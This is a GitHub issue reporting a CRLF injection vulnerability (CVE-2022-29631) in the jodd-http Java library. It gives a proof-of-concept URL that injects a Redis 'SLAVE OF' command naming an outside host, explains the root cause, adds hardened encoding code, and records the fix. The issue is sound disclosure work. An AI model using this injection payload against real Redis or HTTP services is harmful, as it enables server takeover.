
CRLF injection vulnerability in jodd-http #9

Closed

1nhann opened this issue Apr 17, 2022 · 0 comments
Assignees: igr
Labels: bug (Something isn't working), good first issue (Good for newcomers)

Comments

@1nhann (Contributor) commented Apr 17, 2022

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29631

CRLF injection vulnerability in jodd-http

CRLF injection vulnerability in jodd.http.HttpRequest#set and jodd.http.HttpRequest#send in jodd-http versions 5.0.x, 5.1.x, 5.2.x, 6.0.x, 6.1.x, 6.2.x (all versions so far) allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL.

Proof of concept:

```xml
<dependency>
    <groupId>org.jodd</groupId>
    <artifactId>jodd-http</artifactId>
    <version>6.2.0</version>
</dependency>
```

```java
package top.inhann;

import jodd.http.HttpRequest;
import jodd.http.HttpResponse;

public class Test {
    public static void main(String[] args) {
        // The path contains raw CRLF sequences, which jodd-http appends to the
        // request line verbatim, so the remainder is sent as extra data on the wire.
        String url = "http://127.0.0.1:6379/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\nSLAVE OF inhann.top:6379\r\n\r\nPOST / ";
        HttpRequest req = HttpRequest.get(url);
        HttpResponse res = req.send();
    }
}
```

Run the PoC and listen on 127.0.0.1:6379.

Details:

In jodd.http.HttpRequest#set(), when processing the path, this.path(destination); is called, and it is allowed to inject \r\n in the query string, path and fragment.

In jodd.http.HttpRequest#sendTo(), this.buffer(true); is called and tries to build the HTTP request payload. However, the path, query string, fragment and other components are just appended insecurely, which leads to the CRLF injection.

Suggestion:

It is recommended to URL-encode the invalid characters when constructing the HTTP request payload.
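To illustrate the suggestion above, an added example that is neither jodd-http's own code nor the reporter's: the verbatim concatenation the report describes sits beside a hardened builder that percent-encodes CR, LF and other control bytes in the request target, plus a stricter reject-instead-of-encode check. The class and method names are hypothetical and the input string is constructed.

```java
import java.nio.charset.StandardCharsets;

// Hypothetical helper class, not part of jodd-http.
public final class CrlfSafeRequestLine {

    // Insecure: the target is appended verbatim, so CR/LF inside it ends the
    // request line early and everything after it goes out as extra wire data.
    static String naiveRequestLine(String method, String target) {
        return method + " " + target + " HTTP/1.1\r\n";
    }

    // Percent-encode every byte that must never appear raw in a request target:
    // controls (including CR and LF), space, DEL and non-ASCII. Reserved
    // characters such as '/' and '?' are left untouched.
    static String encodeTarget(String target) {
        StringBuilder sb = new StringBuilder();
        for (byte b : target.getBytes(StandardCharsets.UTF_8)) {
            int c = b & 0xff;
            if (c <= 0x20 || c >= 0x7f) {
                sb.append('%').append(String.format("%02X", c));
            } else {
                sb.append((char) c);
            }
        }
        return sb.toString();
    }

    // Stricter alternative: refuse the URL instead of silently rewriting it.
    static String requireNoCrlf(String target) {
        if (target.indexOf('\r') >= 0 || target.indexOf('\n') >= 0) {
            throw new IllegalArgumentException("CR or LF in request target");
        }
        return target;
    }

    static String safeRequestLine(String method, String target) {
        return method + " " + encodeTarget(target) + " HTTP/1.1\r\n";
    }

    public static void main(String[] args) {
        // Constructed input with the same shape as the report's PoC path.
        String target = "/ HTTP/1.1\r\nHost: 127.0.0.1:6379\r\n\r\nINJECTED\r\n\r\nPOST / ";
        System.out.print(naiveRequestLine("GET", target)); // split into two requests
        System.out.print(safeRequestLine("GET", target));  // one line, CRLF as %0D%0A
        try {
            requireNoCrlf(target);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```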

igr transferred this issue from oblac/jodd Apr 18, 2022
igr self-assigned this Apr 18, 2022
igr added the bug (Something isn't working) and good first issue (Good for newcomers) labels Apr 18, 2022
igr added a commit to 1nhann/jodd-http that referenced this issue Apr 18, 2022
igr closed this as completed in e50f573 Apr 18, 2022
Development: No branches or pull requests

2 participants